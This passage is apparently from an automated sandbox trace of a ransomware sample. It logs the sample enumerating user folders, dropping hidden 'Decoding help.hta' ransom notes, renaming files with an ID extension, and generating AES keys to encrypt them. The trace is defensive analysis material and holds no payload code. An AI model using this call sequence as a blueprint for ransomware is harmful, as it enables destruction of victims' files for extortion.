dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.016] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.016] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.016] FindNextFileW (in: hFindFile=0x5e28b0, lpFindFileData=0x674fd30 | out: lpFindFileData=0x674fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b86e090, ftCreationTime.dwHighDateTime=0x1d4c9ae, ftLastAccessTime.dwLowDateTime=0x536ee8d0, ftLastAccessTime.dwHighDateTime=0x1d4c7e6, ftLastWriteTime.dwLowDateTime=0x536ee8d0, ftLastWriteTime.dwHighDateTime=0x1d4c7e6, nFileSizeHigh=0x0, nFileSizeLow=0xf554, dwReserved0=0x0, dwReserved1=0x0, cFileName="1FL-A8.bmp", cAlternateFileName="")) returned 1 [0049.016] lstrcpyW (in: lpString1=0x5e90c18, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\*.*" [0049.016] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\*.*") returned 57 [0049.016] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\Decoding help.hta" [0049.016] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\g_s-w2bcxqr\\decoding help.hta")) returned 0xffffffff [0049.016] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\g_s-w2bcxqr\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0051.144] WriteFile (in: hFile=0x3d4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x674fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x674fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0052.595] CloseHandle (hObject=0x3d4) returned 1 [0053.675] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.411] lstrcmpiW (lpString1="Decoding help.hta", lpString2="1FL-A8.bmp") returned 1 [0058.411] lstrlenW (lpString="1FL-A8.bmp") returned 10 [0058.411] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\*.*" [0058.411] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\*.*") returned 57 [0058.411] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\", lpString2="1FL-A8.bmp" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\1FL-A8.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\1FL-A8.bmp" [0058.411] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\1FL-A8.bmp" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\1FL-A8.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\1FL-A8.bmp" [0058.411] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\1FL-A8.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\1FL-A8.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\1FL-A8.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.411] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\1FL-A8.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\g_s-w2bcxqr\\1fl-a8.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\1FL-A8.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\g_s-w2bcxqr\\1fl-a8.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.412] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\1FL-A8.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\g_s-w2bcxqr\\1fl-a8.bmp.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbf8 [0058.413] CreateFileMappingA (hFile=0xbf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xbfc [0058.413] CryptAcquireContextA (in: phProv=0x674fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x674fcec*=0x2aac6000) returned 1 [0060.213] CryptGenKey (in: hProv=0x2aac6000, Algid=0x6610, dwFlags=0x1, phKey=0x674fce8 | out: phKey=0x674fce8*=0x5fca6e0) returned 1 [0060.213] CryptExportKey (in: hKey=0x5fca6e0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x674fbe4, pdwDataLen=0x674fce4 | out: pbData=0x674fbe4*, pdwDataLen=0x674fce4*=0x2c) returned 1 [0060.213] MapViewOfFile (hFileMappingObject=0xbfc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf540) returned 0x3a80000 Thread: id = 641 os_tid = 0xe48 [0049.022] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*", lpFindFileData=0x688fd30 | out: lpFindFileData=0x688fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 642 os_tid = 0xe4c [0049.027] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*", lpFindFileData=0x6d4fd30 | out: lpFindFileData=0x6d4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db5f8 [0049.028] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.028] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0x6d4fd30 | out: lpFindFileData=0x6d4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.028] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.028] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.028] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0x6d4fd30 | out: lpFindFileData=0x6d4fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1df, dwReserved0=0x0, dwReserved1=0x0, cFileName="directories.acrodata", cAlternateFileName="DIRECT~1.ACR")) returned 1 [0049.028] lstrcpyW (in: lpString1=0x1116bbc0, lpString2="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*") returned="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*" [0049.028] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*") returned 60 [0049.028] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\Decoding help.hta" [0049.028] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\Decoding help.hta" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\decoding help.hta")) returned 0xffffffff [0049.028] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\Decoding help.hta" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0050.385] WriteFile (in: hFile=0x418, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x6d4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x6d4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0052.542] CloseHandle (hObject=0x418) returned 1 [0053.667] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.732] lstrcmpiW (lpString1="Decoding help.hta", lpString2="directories.acrodata") returned -1 [0058.733] lstrlenW (lpString="directories.acrodata") returned 20 [0058.733] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*") returned="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*" [0058.733] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*") returned 60 [0058.733] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", lpString2="directories.acrodata" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata") returned="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" [0058.733] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata") returned="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" [0058.733] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.[ID]g9uZrLhJaygpwRm1[ID]" [0058.733] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata"), lpNewFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.733] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0x6d4fd30 | out: lpFindFileData=0x6d4fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1df, dwReserved0=0x0, dwReserved1=0x0, cFileName="directories.acrodata", cAlternateFileName="DIRECT~1.ACR")) returned 0 [0058.733] FindClose (in: hFindFile=0x5db5f8 | out: hFindFile=0x5db5f8) returned 1 Thread: id = 643 os_tid = 0xe50 [0049.033] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*", lpFindFileData=0x788fd30 | out: lpFindFileData=0x788fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 644 os_tid = 0xe54 [0049.038] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*", lpFindFileData=0x79efd30 | out: lpFindFileData=0x79efd30*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2cf0 [0051.362] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0051.362] FindNextFileW (in: hFindFile=0x5e2cf0, lpFindFileData=0x79efd30 | out: lpFindFileData=0x79efd30*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.362] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0051.362] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0051.362] FindNextFileW (in: hFindFile=0x5e2cf0, lpFindFileData=0x79efd30 | out: lpFindFileData=0x79efd30*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0051.362] lstrcpyW (in: lpString1=0x11173bc8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*" [0051.362] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*") returned 57 [0051.362] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Decoding help.hta" [0051.362] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\decoding help.hta")) returned 0xffffffff [0051.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0058.274] WriteFile (in: hFile=0x308, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x79efcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x79efcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.275] CloseHandle (hObject=0x308) returned 1 [0058.278] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.278] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0058.278] lstrlenW (lpString="desktop.ini") returned 11 [0058.278] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*" [0058.278] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*") returned 57 [0058.278] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" [0058.278] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" [0058.278] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0058.278] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.608] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0061.608] CreateFileMappingA (hFile=0x314, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x8d8 [0061.608] CryptAcquireContextA (phProv=0x79efcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 645 os_tid = 0xe58 [0049.043] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*", lpFindFileData=0x864fd30 | out: lpFindFileData=0x864fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 646 os_tid = 0xe5c [0054.437] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\*.*", lpFindFileData=0x88cfd30 | out: lpFindFileData=0x88cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2192a170, ftCreationTime.dwHighDateTime=0x1d4ce45, ftLastAccessTime.dwLowDateTime=0x3720e5e0, ftLastAccessTime.dwHighDateTime=0x1d4c63b, ftLastWriteTime.dwLowDateTime=0x3720e5e0, ftLastWriteTime.dwHighDateTime=0x1d4c63b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2e70 [0054.437] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.437] FindNextFileW (in: hFindFile=0x5e2e70, lpFindFileData=0x88cfd30 | out: lpFindFileData=0x88cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2192a170, ftCreationTime.dwHighDateTime=0x1d4ce45, ftLastAccessTime.dwLowDateTime=0x3720e5e0, ftLastAccessTime.dwHighDateTime=0x1d4c63b, ftLastWriteTime.dwLowDateTime=0x3720e5e0, ftLastWriteTime.dwHighDateTime=0x1d4c63b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.437] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.437] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.437] FindNextFileW (in: hFindFile=0x5e2e70, lpFindFileData=0x88cfd30 | out: lpFindFileData=0x88cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4917be0, ftCreationTime.dwHighDateTime=0x1d4d459, ftLastAccessTime.dwLowDateTime=0xfd5cd300, ftLastAccessTime.dwHighDateTime=0x1d4ced2, ftLastWriteTime.dwLowDateTime=0xfd5cd300, ftLastWriteTime.dwHighDateTime=0x1d4ced2, nFileSizeHigh=0x0, nFileSizeLow=0x153de, dwReserved0=0x0, dwReserved1=0x0, cFileName="HUUPqiZJ.xls", cAlternateFileName="")) returned 1 [0054.437] lstrcpyW (in: lpString1=0x25440540, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\*.*" [0054.437] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\*.*") returned 58 [0054.437] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\Decoding help.hta" [0054.437] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nl8-tp3lig\\decoding help.hta")) returned 0xffffffff [0054.437] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nl8-tp3lig\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0054.438] WriteFile (in: hFile=0x4c8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x88cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x88cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0055.449] CloseHandle (hObject=0x4c8) returned 1 [0058.282] SetFileAttributesW 